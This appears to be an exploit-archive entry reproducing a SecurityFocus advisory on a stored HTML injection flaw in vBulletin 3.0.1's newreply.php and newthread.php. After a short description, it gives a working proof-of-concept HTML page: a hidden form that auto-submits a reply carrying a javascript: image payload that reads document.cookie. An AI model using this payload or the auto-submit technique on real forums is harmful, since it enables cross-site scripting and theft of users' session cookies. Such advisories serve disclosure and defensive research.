20 lines
No EOL
977 B
HTML
Executable file
20 lines
No EOL
977 B
HTML
Executable file
source: http://www.securityfocus.com/bid/10602/info
|
|
|
|
VBulletin is reported prone to an HTML injection vulnerability. This issue affects the 'newreply.php' and 'newthread.php' scripts.
|
|
|
|
An attacker may exploit this issue by including hostile HTML and script code in fields that may be viewable by other users, potentially allowing for theft of cookie-based authentication credentials and other attacks.
|
|
|
|
This issue is reported to affect VBulletin version 3.0.1, however, it is likely that other versions are affected as well.
|
|
|
|
<form action="http://www.example.com/newreply.php" name="vbform"
|
|
method="post" style='visibility:hidden'>
|
|
<input name="WYSIWYG_HTML"
|
|
value="<IMG src="javascript:alert(document.cookie)">"/>
|
|
<input name="do" value="postreply"/>
|
|
<input name="t" value="123456" />
|
|
<input name="p" value="123456" />
|
|
<input type="submit" class="button" name="preview"/>
|
|
</form>
|
|
<script>
|
|
document.all.preview.click();
|
|
</script> |